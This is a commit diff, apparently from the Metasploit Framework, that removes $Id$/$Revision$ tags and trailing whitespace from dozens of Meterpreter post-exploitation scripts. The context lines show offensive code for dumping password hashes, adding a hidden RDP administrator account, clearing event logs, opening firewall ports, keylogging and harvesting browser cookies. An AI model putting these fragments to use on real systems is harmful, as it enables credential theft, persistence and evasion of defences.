Browse Source

Remove Id tags in scripts/

James Lee 6 years ago
parent
commit
ca53c6f15b
68 changed files with 90 additions and 244 deletions
  1. 1
    3
      scripts/meterpreter/arp_scanner.rb
  2. 0
    3
      scripts/meterpreter/autoroute.rb
  3. 0
    2
      scripts/meterpreter/checkvm.rb
  4. 0
    2
      scripts/meterpreter/credcollect.rb
  5. 0
    2
      scripts/meterpreter/domain_list_gen.rb
  6. 0
    2
      scripts/meterpreter/dumplinks.rb
  7. 0
    2
      scripts/meterpreter/duplicate.rb
  8. 0
    2
      scripts/meterpreter/enum_chrome.rb
  9. 1
    3
      scripts/meterpreter/enum_firefox.rb
  10. 0
    2
      scripts/meterpreter/enum_logged_on_users.rb
  11. 1
    3
      scripts/meterpreter/enum_powershell_env.rb
  12. 1
    3
      scripts/meterpreter/enum_putty.rb
  13. 1
    3
      scripts/meterpreter/enum_shares.rb
  14. 3
    6
      scripts/meterpreter/enum_vmware.rb
  15. 12
    14
      scripts/meterpreter/event_manager.rb
  16. 0
    2
      scripts/meterpreter/file_collector.rb
  17. 1
    3
      scripts/meterpreter/get_application_list.rb
  18. 0
    2
      scripts/meterpreter/get_env.rb
  19. 3
    7
      scripts/meterpreter/get_filezilla_creds.rb
  20. 0
    3
      scripts/meterpreter/get_local_subnets.rb
  21. 1
    3
      scripts/meterpreter/get_pidgin_creds.rb
  22. 3
    5
      scripts/meterpreter/get_valid_community.rb
  23. 1
    3
      scripts/meterpreter/getcountermeasure.rb
  24. 3
    5
      scripts/meterpreter/getgui.rb
  25. 2
    4
      scripts/meterpreter/gettelnet.rb
  26. 0
    2
      scripts/meterpreter/getvncpw.rb
  27. 10
    12
      scripts/meterpreter/hashdump.rb
  28. 0
    2
      scripts/meterpreter/hostsedit.rb
  29. 3
    5
      scripts/meterpreter/keylogrecorder.rb
  30. 0
    2
      scripts/meterpreter/killav.rb
  31. 0
    3
      scripts/meterpreter/metsvc.rb
  32. 0
    2
      scripts/meterpreter/migrate.rb
  33. 2
    4
      scripts/meterpreter/multi_console_command.rb
  34. 0
    2
      scripts/meterpreter/multi_meter_inject.rb
  35. 0
    2
      scripts/meterpreter/multicommand.rb
  36. 0
    2
      scripts/meterpreter/multiscript.rb
  37. 11
    13
      scripts/meterpreter/netenum.rb
  38. 0
    2
      scripts/meterpreter/packetrecorder.rb
  39. 0
    2
      scripts/meterpreter/panda_2007_pavsrv51.rb
  40. 0
    2
      scripts/meterpreter/persistence.rb
  41. 0
    2
      scripts/meterpreter/pml_driver_config.rb
  42. 0
    2
      scripts/meterpreter/powerdump.rb
  43. 0
    2
      scripts/meterpreter/prefetchtool.rb
  44. 0
    2
      scripts/meterpreter/process_memdump.rb
  45. 1
    3
      scripts/meterpreter/remotewinenum.rb
  46. 0
    2
      scripts/meterpreter/scheduleme.rb
  47. 1
    6
      scripts/meterpreter/schelevator.rb
  48. 0
    2
      scripts/meterpreter/schtasksabuse.rb
  49. 0
    2
      scripts/meterpreter/scraper.rb
  50. 0
    2
      scripts/meterpreter/screen_unlock.rb
  51. 0
    2
      scripts/meterpreter/screenspy.rb
  52. 0
    2
      scripts/meterpreter/search_dwld.rb
  53. 3
    5
      scripts/meterpreter/service_manager.rb
  54. 0
    2
      scripts/meterpreter/service_permissions_escalate.rb
  55. 0
    2
      scripts/meterpreter/sound_recorder.rb
  56. 0
    3
      scripts/meterpreter/srt_webdrive_priv.rb
  57. 0
    2
      scripts/meterpreter/uploadexec.rb
  58. 0
    4
      scripts/meterpreter/virtualbox_sysenter_dos.rb
  59. 0
    3
      scripts/meterpreter/virusscan_bypass.rb
  60. 0
    3
      scripts/meterpreter/vnc.rb
  61. 0
    2
      scripts/meterpreter/webcam.rb
  62. 4
    8
      scripts/meterpreter/win32-sshclient.rb
  63. 14
    18
      scripts/meterpreter/win32-sshserver.rb
  64. 5
    7
      scripts/meterpreter/winbf.rb
  65. 2
    4
      scripts/meterpreter/winenum.rb
  66. 0
    2
      scripts/meterpreter/wmic.rb
  67. 0
    2
      scripts/shell/migrate.rb
  68. 0
    2
      scripts/shell/spawn_meterpreter.rb

+ 1
- 3
scripts/meterpreter/arp_scanner.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
4 2
 #-------------------------------------------------------------------------------
5 3
 ################## Variable Declarations ##################
@@ -22,7 +20,7 @@ def enum_int
22 20
 			print_status("\t#{i.netmask}")
23 21
 			print_status()
24 22
 		end
25
-		
23
+
26 24
 	end
27 25
 end
28 26
 

+ 0
- 3
scripts/meterpreter/autoroute.rb View File

@@ -1,6 +1,3 @@
1
-# $Id$
2
-# $Revision$
3
-
4 1
 #
5 2
 # Meterpreter script for setting up a route from within a
6 3
 # Meterpreter session, without having to background the

+ 0
- 2
scripts/meterpreter/checkvm.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 # Meterpreter script for detecting if target host is a Virtual Machine
4 2
 # Provided by Carlos Perez at carlos_perez[at]darkoperator.com
5 3
 # Version: 0.2.0

+ 0
- 2
scripts/meterpreter/credcollect.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 # credcollect - tebo[at]attackresearch.com
4 2
 
5 3
 opts = Rex::Parser::Arguments.new(

+ 0
- 2
scripts/meterpreter/domain_list_gen.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
4 2
 #-------------------------------------------------------------------------------
5 3
 #Options and Option Parsing

+ 0
- 2
scripts/meterpreter/dumplinks.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 # Author: davehull at dph_msf@trustedsignal.com
4 2
 #-------------------------------------------------------------------------------
5 3
 

+ 0
- 2
scripts/meterpreter/duplicate.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 # Author: Scriptjunkie
4 2
 # Uses a meterpreter session to spawn a new meterpreter session in a different process.
5 3
 # A new process allows the session to take "risky" actions that might get the process killed by

+ 0
- 2
scripts/meterpreter/enum_chrome.rb View File

@@ -1,5 +1,3 @@
1
-#$Id$
2
-#$Revision$
3 1
 #
4 2
 # Script to extract data from a chrome installation.
5 3
 #

+ 1
- 3
scripts/meterpreter/enum_firefox.rb View File

@@ -1,6 +1,4 @@
1 1
 #
2
-# $Id: enum_firefox.rb 9770 2010-07-10 20:00:32Z darkoperator $
3
-# $Revision: $
4 2
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
5 3
 #-------------------------------------------------------------------------------
6 4
 ################## Variable Declarations ##################
@@ -34,7 +32,7 @@ def frfxplacesget(path,usrnm)
34 32
 		fullpath = path + '\\' + x
35 33
 		if @client.fs.file.stat(fullpath).directory?
36 34
 			frfxplacesget(fullpath,usrnm)
37
-		elsif fullpath =~ /(formhistory.sqlite|cookies.sqlite|places.sqlite|search.sqlite)/i	
35
+		elsif fullpath =~ /(formhistory.sqlite|cookies.sqlite|places.sqlite|search.sqlite)/i
38 36
 			dst = x
39 37
 			dst = @logs + ::File::Separator + usrnm + dst
40 38
 			print_status("\tDownloading Firefox Database file #{x} to '#{dst}'")

+ 0
- 2
scripts/meterpreter/enum_logged_on_users.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision: 9771 $
3 1
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
4 2
 #-------------------------------------------------------------------------------
5 3
 ################## Variable Declarations ##################

+ 1
- 3
scripts/meterpreter/enum_powershell_env.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision: $
3 1
 #Meterpreter script for enumerating Microsoft Powershell settings.
4 2
 #Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
5 3
 @client = client
@@ -116,7 +114,7 @@ def enum_powershell
116 114
 			end
117 115
 		end
118 116
 
119
-		
117
+
120 118
 	end
121 119
 end
122 120
 if client.platform =~ /win32|win64/

+ 1
- 3
scripts/meterpreter/enum_putty.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision: $
3 1
 #
4 2
 # Meterpreter script for enumerating putty connections
5 3
 # Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
@@ -22,7 +20,7 @@ opts.parse(args) { |opt, idx, val|
22 20
 
23 21
 def hkcu_base
24 22
 	key_base = []
25
-	
23
+
26 24
 	if not is_system?
27 25
 		key_base << "HKCU"
28 26
 	else

+ 1
- 3
scripts/meterpreter/enum_shares.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
4 2
 #-------------------------------------------------------------------------------
5 3
 ################## Variable Declarations ##################
@@ -76,7 +74,7 @@ if client.platform =~ /win32|64/
76 74
 
77 75
 	# Enumerate shares being offered
78 76
 	enum_conf_shares()
79
-	
77
+
80 78
 	if not is_system?
81 79
 		mount_history = enum_recent_mounts("HKEY_CURRENT_USER")
82 80
 		run_history = enum_run_unc("HKEY_CURRENT_USER")

+ 3
- 6
scripts/meterpreter/enum_vmware.rb View File

@@ -1,6 +1,3 @@
1
-# $Id: $
2
-# $Revision$
3
-
4 1
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
5 2
 #-------------------------------------------------------------------------------
6 3
 ################## Variable Declarations ##################
@@ -102,7 +99,7 @@ def enum_viclient
102 99
 			end
103 100
 		end
104 101
 	end
105
-	
102
+
106 103
 	if not is_system?
107 104
 		recentconns = registry_getvaldata("HKCU\\Software\\VMware\\VMware Infrastructure Client\\Preferences","RecentConnections").split(",")
108 105
 		print_status("Recent VI Client Connections:")
@@ -116,7 +113,7 @@ def enum_viclient
116 113
 				ssl_key = registry_getvaldata("HKCU\\Software\\VMware\\Virtual Infrastructure Client\\Preferences\\UI\\SSLIgnore",issl)
117 114
 				print_status("\tHost: #{issl} SSL Fingerprint: #{ssl_key}")
118 115
 			end
119
-		
116
+
120 117
 		end
121 118
 	else
122 119
 		user_sid = []
@@ -283,7 +280,7 @@ def enum_vmwarewrk
283 280
 		end
284 281
 	end
285 282
 	fav_file.each_line do |l|
286
-	
283
+
287 284
 		if l =~ /config/
288 285
 			print_status("\tConfiguration File: #{l.scan(/vmlist\d*.config \= (\".*\")/)}")
289 286
 		end

+ 12
- 14
scripts/meterpreter/event_manager.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
4 2
 #-------------------------------------------------------------------------------
5 3
 ################## Variable Declarations ##################
@@ -48,7 +46,7 @@ def get_log_details
48 46
 	logs_detail = Array.new
49 47
 
50 48
 	eventlog_list.each do |log_name|
51
-	
49
+
52 50
 		# Create a hash to store the log info in (and throw default info in)
53 51
 		log_detail = Hash.new
54 52
 		log_detail[:name] = log_name
@@ -62,11 +60,11 @@ def get_log_details
62 60
 		else
63 61
 			key = "#{key}eventlog"
64 62
 		end
65
-	
63
+
66 64
 		begin
67 65
 			unless (registry_getvaldata("#{key}\\#{log_name}","Retention") == 0) then log_detail[:retention] = "Disabled" end
68 66
 			log_detail[:size] = registry_getvaldata("#{key}\\#{log_name}","MaxSize")
69
-			
67
+
70 68
 			# Open the event log
71 69
 			eventlog = @client.sys.eventlog.open(log_name)
72 70
 			log_detail[:num_of_records] = eventlog.length
@@ -74,10 +72,10 @@ def get_log_details
74 72
 			log_detail[:num_of_records] = "Access Denied"
75 73
 		end
76 74
 
77
-		
75
+
78 76
 		logs_detail << log_detail
79 77
 	end
80
-	
78
+
81 79
 	return logs_detail
82 80
 end
83 81
 
@@ -95,13 +93,13 @@ def print_log_details
95 93
 			"Maximum Size",
96 94
 			"Records"
97 95
 		])
98
-		
96
+
99 97
 	eventlog_details = get_log_details
100 98
 
101 99
 	eventlog_details.each do |log_detail|
102 100
 		tbl << [log_detail[:name],log_detail[:retention],"#{log_detail[:size]}K",log_detail[:num_of_records]]
103 101
 	end
104
-	
102
+
105 103
 	print_line("\n" + tbl.to_s + "\n")
106 104
 end
107 105
 
@@ -135,7 +133,7 @@ def list_logs(eventlog_name,filter,filter_string,logs,local_log,sup_print)
135 133
 		print_error("Failed to Open Event Log #{eventlog_name}")
136 134
 		raise Rex::Script::Completed
137 135
 	end
138
-	
136
+
139 137
 	if local_log
140 138
 		log_file = File.join(logs, "#{eventlog_name}.csv")
141 139
 		print_good("CSV File saved to #{log_file}")
@@ -152,7 +150,7 @@ def clear_logs(log_name=nil)
152 150
 	else
153 151
 		log_names << log_name
154 152
 	end
155
-	
153
+
156 154
 	log_names.each do |name|
157 155
 		begin
158 156
 			print_status("Clearing #{name}")
@@ -163,7 +161,7 @@ def clear_logs(log_name=nil)
163 161
 			print_error("Failed to Clear #{name}, Access Denied")
164 162
 		end
165 163
 	end
166
-	
164
+
167 165
 	return log_names
168 166
 end
169 167
 
@@ -221,7 +219,7 @@ if local_log
221 219
 	else
222 220
 		logs = ::File.join(Msf::Config.log_directory, "scripts", 'event_manager', Rex::FileUtils.clean_path(host + filenameinfo) )
223 221
 	end
224
-	
222
+
225 223
 	::FileUtils.mkdir_p(logs)
226 224
 end
227 225
 
@@ -242,5 +240,5 @@ if clear_logs
242 240
 			print_status eventlog_name + ": "
243 241
 			clear_logs(eventlog_name)
244 242
 		end
245
-	end				
243
+	end
246 244
 end

+ 0
- 2
scripts/meterpreter/file_collector.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
4 2
 #-------------------------------------------------------------------------------
5 3
 @client = client

+ 1
- 3
scripts/meterpreter/get_application_list.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision: $
3 1
 # Meterpreter script for listing installed applications and their version.
4 2
 # Provided: carlos_perez[at]darkoperator[dot]com
5 3
 
@@ -54,7 +52,7 @@ opts.parse(args) { |opt, idx, val|
54 52
 		print_line "Meterpreter Script for extracting a list installed applications and their version."
55 53
 		print_line(opts.usage)
56 54
 		raise Rex::Script::Completed
57
-		
55
+
58 56
 	end
59 57
 }
60 58
 if client.platform =~ /win32|win64/

+ 0
- 2
scripts/meterpreter/get_env.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision: $
3 1
 #-------------------------------------------------------------------------------
4 2
 #Options and Option Parsing
5 3
 opts = Rex::Parser::Arguments.new(

+ 3
- 7
scripts/meterpreter/get_filezilla_creds.rb View File

@@ -1,7 +1,3 @@
1
-##
2
-# $Id$
3
-# $Revision: $
4
-##
5 1
 
6 2
 require "rexml/document"
7 3
 
@@ -90,7 +86,7 @@ def extract_saved_creds(path,xml_file)
90 86
 			print_status "\tUser: #{e.elements["User"].text}"
91 87
 			creds << "User: #{e.elements["User"].text}"
92 88
 		end
93
-		
89
+
94 90
 		proto = e.elements["Protocol"].text
95 91
 		if  proto == "0"
96 92
 			print_status "\tProtocol: FTP"
@@ -109,14 +105,14 @@ def extract_saved_creds(path,xml_file)
109 105
 		creds << ""
110 106
 
111 107
 	end
112
-#	
108
+#
113 109
 	return creds
114 110
 end
115 111
 #-------------------------------------------------------------------------------
116 112
 #Function to enumerate the users if running as SYSTEM
117 113
 def enum_users(os)
118 114
 	users = []
119
-	
115
+
120 116
 	path4users = ""
121 117
 	sysdrv = @client.fs.file.expand_path("%SystemDrive%")
122 118
 

+ 0
- 3
scripts/meterpreter/get_local_subnets.rb View File

@@ -1,6 +1,3 @@
1
-# $Id$
2
-# $Revision$
3
-
4 1
 # Meterpreter script that display local subnets
5 2
 # Provided by Nicob <nicob [at] nicob.net>
6 3
 # Ripped from http://blog.metasploit.com/2006/10/meterpreter-scripts-and-msrt.html

+ 1
- 3
scripts/meterpreter/get_pidgin_creds.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
4 2
 #-------------------------------------------------------------------------------
5 3
 require "rexml/document"
@@ -145,7 +143,7 @@ end
145 143
 #Function to enumerate the users if running as SYSTEM
146 144
 def enum_users(os)
147 145
 	users = []
148
-	
146
+
149 147
 	path4users = ""
150 148
 	sysdrv = @client.fs.file.expand_path("%SystemDrive%")
151 149
 

+ 3
- 5
scripts/meterpreter/get_valid_community.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 
4 2
 #copied getvncpw - thanks grutz/carlos
5 3
 
@@ -15,7 +13,7 @@ def usage()
15 13
 end
16 14
 
17 15
 def get_community(session)
18
-	key = "HKLM\\System\\CurrentControlSet\\Services\\SNMP\\Parameters\\ValidCommunities"	
16
+	key = "HKLM\\System\\CurrentControlSet\\Services\\SNMP\\Parameters\\ValidCommunities"
19 17
 	root_key, base_key = session.sys.registry.splitkey(key)
20 18
 	open_key = session.sys.registry.open_key(root_key,base_key,KEY_READ)
21 19
 	begin
@@ -37,7 +35,7 @@ end
37 35
 if client.platform =~ /win32|win64/
38 36
 	print_status("Searching for community strings...")
39 37
 	strs = get_community(session)
40
-	if strs	
38
+	if strs
41 39
 		strs.each do |str|
42 40
 			print_good("FOUND: #{str}")
43 41
 			@client.framework.db.report_auth_info(
@@ -50,7 +48,7 @@ if client.platform =~ /win32|win64/
50 48
 				:type	=> "snmp.community",
51 49
 				:duplicate_ok	=> true
52 50
 			)
53
-		end		
51
+		end
54 52
 	else
55 53
 		print_status("Not found")
56 54
 	end

+ 1
- 3
scripts/meterpreter/getcountermeasure.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 #
4 2
 # Meterpreter script for detecting AV, HIPS, Third Party Firewalls, DEP Configuration and Windows Firewall configuration.
5 3
 # Provides also the option to kill the processes of detected products and disable the built-in firewall.
@@ -177,7 +175,7 @@ avs = %W{
177 175
 	oasclnt.exe
178 176
 	ofcdog.exe
179 177
 	opscan.exe
180
-	ossec-agent.exe	
178
+	ossec-agent.exe
181 179
 	outpost.exe
182 180
 	paamsrv.exe
183 181
 	pavfnsvr.exe

+ 3
- 5
scripts/meterpreter/getgui.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
4 2
 #-------------------------------------------------------------------------------
5 3
 ################## Variable Declarations ##################
@@ -67,7 +65,7 @@ def enabletssrv()
67 65
 			file_local_write(@dest,"execute -H -f cmd.exe -a \"/c sc config termservice start= disabled\"")
68 66
 			cmd_exec("sc start termservice")
69 67
 			file_local_write(@dest,"execute -H -f cmd.exe -a \"/c sc stop termservice\"")
70
-			
68
+
71 69
 		else
72 70
 			print_status "\tTerminal Services service is already set to auto"
73 71
 		end
@@ -83,7 +81,7 @@ end
83 81
 
84 82
 
85 83
 def addrdpusr(session, username, password)
86
-		
84
+
87 85
 	rdu = resolve_sid("S-1-5-32-555")[:name]
88 86
 	admin = resolve_sid("S-1-5-32-544")[:name]
89 87
 
@@ -100,7 +98,7 @@ def addrdpusr(session, username, password)
100 98
 			file_local_write(@dest,"reg deleteval -k HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\ NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList -v #{username}")
101 99
 			print_status "\tAdding User: #{username} to local group '#{rdu}'"
102 100
 			cmd_exec("cmd.exe","/c net localgroup \"#{rdu}\" #{username} /add")
103
-		
101
+
104 102
 			print_status "\tAdding User: #{username} to local group '#{admin}'"
105 103
 			cmd_exec("cmd.exe","/c net localgroup #{admin}  #{username} /add")
106 104
 			print_status "You can now login with the created user"

+ 2
- 4
scripts/meterpreter/gettelnet.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
4 2
 #-------------------------------------------------------------------------------
5 3
 ################## Variable Declarations ##################
@@ -60,7 +58,7 @@ def insttlntsrv()
60 58
 			end
61 59
 			file_local_write(@dest,"execute -H -f cmd.exe -a \"/c ocsetup TelnetServer /uninstall\"")
62 60
 			print_status("Finished installing the Telnet Service.")
63
-			
61
+
64 62
 		end
65 63
 	elsif trgtos =~ /2003/
66 64
 		file_local_write(@dest,"reg setval -k \"HKLM\\SYSTEM\\CurrentControlSet\\services\\TlntSvr\\\" -v 'Start' -d \"1\"")
@@ -85,7 +83,7 @@ def enabletlntsrv()
85 83
 		# Enabling Exception on the Firewall
86 84
 		print_status "\tOpening port in local firewall if necessary"
87 85
 		cmd_exec('netsh firewall set portopening protocol = tcp port = 23 mode = enable')
88
-	
86
+
89 87
 	rescue::Exception => e
90 88
 		print_status("The following Error was encountered: #{e.class} #{e}")
91 89
 	end

+ 0
- 2
scripts/meterpreter/getvncpw.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 #----------------------------------------------------------------
4 2
 # Meterpreter script to obtain the VNC password out of the
5 3
 # registry and print its decoded cleartext

+ 10
- 12
scripts/meterpreter/hashdump.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 #
4 2
 # Implement pwdump (hashdump) through registry reads + syskey
5 3
 
@@ -101,14 +99,14 @@ def capture_user_keys
101 99
 		users[usr.to_i(16)] ||={}
102 100
 		users[usr.to_i(16)][:F] = uk.query_value("F").data
103 101
 		users[usr.to_i(16)][:V] = uk.query_value("V").data
104
-		
102
+
105 103
 		#Attempt to get Hints (from Win7/Win8 Location)
106 104
 		begin
107 105
 			users[usr.to_i(16)][:UserPasswordHint] = decode_windows_hint(uk.query_value("UserPasswordHint").data.unpack("H*")[0])
108 106
 		rescue ::Rex::Post::Meterpreter::RequestError
109 107
 			users[usr.to_i(16)][:UserPasswordHint] = nil
110 108
 		end
111
-		
109
+
112 110
 		uk.close
113 111
 	end
114 112
 	ok.close
@@ -120,9 +118,9 @@ def capture_user_keys
120 118
 		rid = r.type
121 119
 		users[rid] ||= {}
122 120
 		users[rid][:Name] = usr
123
-		
121
+
124 122
 		#Attempt to get Hints (from WinXP Location) only if it's not set yet
125
-		if users[rid][:UserPasswordHint].nil?	
123
+		if users[rid][:UserPasswordHint].nil?
126 124
 			begin
127 125
 				uk_hint = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Hints\\#{usr}", KEY_READ)
128 126
 				users[rid][:UserPasswordHint] = uk_hint.query_value("").data
@@ -130,7 +128,7 @@ def capture_user_keys
130 128
 				users[rid][:UserPasswordHint] = nil
131 129
 			end
132 130
 		end
133
-		
131
+
134 132
 		uk.close
135 133
 	end
136 134
 	ok.close
@@ -262,9 +260,9 @@ if client.platform =~ /win32|win64/
262 260
 			if !users[rid][:UserPasswordHint].nil? && users[rid][:UserPasswordHint].length > 0
263 261
 				print_line "#{users[rid][:Name]}:\"#{users[rid][:UserPasswordHint]}\""
264 262
 				hint_count += 1
265
-			end	
263
+			end
266 264
 		end
267
-		print_line("No users with password hints on this system") if hint_count == 0 
265
+		print_line("No users with password hints on this system") if hint_count == 0
268 266
 		print_line()
269 267
 
270 268
 		print_status("Dumping password hashes...")
@@ -280,9 +278,9 @@ if client.platform =~ /win32|win64/
280 278
 				:pass  => users[rid][:hashlm].unpack("H*")[0] +":"+ users[rid][:hashnt].unpack("H*")[0],
281 279
 				:type  => "smb_hash"
282 280
 			)
283
-			
281
+
284 282
 			print_line hashstring
285
-			
283
+
286 284
 		end
287 285
 		print_line()
288 286
 		print_line()
@@ -298,4 +296,4 @@ if client.platform =~ /win32|win64/
298 296
 else
299 297
 	print_error("This version of Meterpreter is not supported with this Script!")
300 298
 	raise Rex::Script::Completed
301
-end
299
+end

+ 0
- 2
scripts/meterpreter/hostsedit.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 # Meterpreter script for modifying the hosts file in windows
4 2
 # given a single entrie or several in a file and clear the
5 3
 # DNS cache on the target machine.

+ 3
- 5
scripts/meterpreter/keylogrecorder.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
4 2
 # Updates by Shellster
5 3
 #-------------------------------------------------------------------------------
@@ -75,7 +73,7 @@ def explrmigrate(session,captype,lock,kill)
75 73
 			print_status("\t#{process2mig} Process found, migrating into #{x['pid']}")
76 74
 			session.core.migrate(x['pid'].to_i)
77 75
 			print_status("Migration Successful!!")
78
-			
76
+
79 77
 			if (kill)
80 78
 				begin
81 79
 					print_status("Killing old process")
@@ -149,7 +147,7 @@ def keycap(session, keytime, logfile)
149 147
 		rec = 1
150 148
 		#Creating DB for captured keystrokes
151 149
 		file_local_write(logfile,"")
152
-		
150
+
153 151
 		print_status("Keystrokes being saved in to #{logfile}")
154 152
 		#Inserting keystrokes every number of seconds specified
155 153
 		print_status("Recording ")
@@ -187,7 +185,7 @@ kill = false
187 185
 	when "-l"
188 186
 		lock = true
189 187
 	when "-k"
190
-		kill = true	
188
+		kill = true
191 189
 	end
192 190
 }
193 191
 if client.platform =~ /win32|win64/

+ 0
- 2
scripts/meterpreter/killav.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 #
4 2
 # Meterpreter script that kills all Antivirus processes
5 3
 # Provided by: Jerome Athias <jerome.athias [at] free.fr>

+ 0
- 3
scripts/meterpreter/metsvc.rb View File

@@ -1,6 +1,3 @@
1
-# $Id$
2
-# $Revision$
3
-
4 1
 #
5 2
 # Meterpreter script for installing the meterpreter service
6 3
 #

+ 0
- 2
scripts/meterpreter/migrate.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 #
4 2
 # Simple example script that migrates to a specific process by name.
5 3
 # This is meant as an illustration.

+ 2
- 4
scripts/meterpreter/multi_console_command.rb View File

@@ -1,10 +1,8 @@
1
-# $Id$
2 1
 #
3 2
 # Meterpreter script for running multiple console commands on a meterpreter session
4 3
 # Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
5 4
 # Verion: 0.1
6 5
 #
7
-# $Revision$
8 6
 
9 7
 ################## Variable Declarations ##################
10 8
 @client = client
@@ -48,7 +46,7 @@ end
48 46
 ################## Main ##################
49 47
 @@exec_opts.parse(args) { |opt, idx, val|
50 48
 	case opt
51
-		
49
+
52 50
 	when "-cl"
53 51
 		commands = val.split(",")
54 52
 	when "-rc"
@@ -60,7 +58,7 @@ end
60 58
 				commands << line.chomp
61 59
 			end
62 60
 		end
63
-		
61
+
64 62
 	when "-h"
65 63
 		help = 1
66 64
 	end

+ 0
- 2
scripts/meterpreter/multi_meter_inject.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 # Author: Carlos Perez at carlos_perez[at]darkoperator.com
4 2
 #-------------------------------------------------------------------------------
5 3
 ################## Variable Declarations ##################

+ 0
- 2
scripts/meterpreter/multicommand.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 #Meterpreter script for running multiple commands on Windows 2003, Windows Vista
4 2
 # and Windows XP and Windows 2008 targets.
5 3
 #Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com

+ 0
- 2
scripts/meterpreter/multiscript.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 #Meterpreter script for running multiple scripts on a Meterpreter Session
4 2
 #Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
5 3
 #Verion: 0.2

+ 11
- 13
scripts/meterpreter/netenum.rb View File

@@ -1,5 +1,3 @@
1
-# $Id$
2
-# $Revision$
3 1
 #
4 2
 #Meterpreter script for ping sweeps on Windows 2003, Windows Vista
5 3
 #Windows 2008 and Windows XP targets using native windows commands.
@@ -61,7 +59,7 @@ def stdlookup(session,domain,dest)
61 59
 				end
62 60
 				garbage.clear
63 61
 			end
64
-			
62
+
65 63
 		rescue ::Exception => e
66 64
 			print_status("The following Error was encountered: #{e.class} #{e}")
67 65
 		end
@@ -109,14 +107,14 @@ def reverselookup(session,iprange,dest)
109 107
 										filewrt(dest,"#{ip} is #{hostname[1].chomp("\n")}")
110 108
 									end
111 109
 									break
112
-									
110
+
113 111
 								end
114
-								
112
+
115 113
 							end
116
-							
114
+
117 115
 							r.channel.close
118 116
 							r.close
119
-							
117
+
120 118
 						})
121 119
 					i += 1
122 120
 				else
@@ -128,7 +126,7 @@ def reverselookup(session,iprange,dest)
128 126
 		end
129 127
 	rescue ::Exception => e
130 128
 		print_status("The following Error was encountered: #{e.class} #{e}")
131
-		
129
+
132 130
 	end
133 131
 end
134 132
 
@@ -155,7 +153,7 @@ def frwdlp(session,hostlst,domain,dest)
155 153
 							break
156 154
 						end
157 155
 					end
158
-					
156
+
159 157
 					r.channel.close
160 158
 					r.close
161 159
 				}
@@ -165,7 +163,7 @@ def frwdlp(session,hostlst,domain,dest)
165 163
 				print_status("\t#{t.join.sub(/Address\w*:/, "\t")}")
166 164
 				filewrt(dest,"#{t.join.sub(/Address\w*:/, "\t")}")
167 165
 			end
168
-			
166
+
169 167
 		else
170 168
 			print_status("File #{hostlst}does not exists!")
171 169
 			exit
@@ -211,7 +209,7 @@ def pingsweep(session,iprange,dest)
211 209
 							end
212 210
 							r.channel.close
213 211
 							r.close
214
-							
212
+
215 213
 						})
216 214
 					i += 1
217 215
 				else
@@ -223,7 +221,7 @@ def pingsweep(session,iprange,dest)
223 221
 		end
224 222
 	rescue ::Exception => e
225 223
 		print_status("The following Error was encountered: #{e.class} #{e}")
226
-		
224
+
227 225
 	end
228 226
 end
229 227
 #-------------------------------------------------------------------------------
@@ -297,7 +295,7 @@ srvrc = nil
297 295
 		hostlist = val
298 296
 	when "-r"
299 297
